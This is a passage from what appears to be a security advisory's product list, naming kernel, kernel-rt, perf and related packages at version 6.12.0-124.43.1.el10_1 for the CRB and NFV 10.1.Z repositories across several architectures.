"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
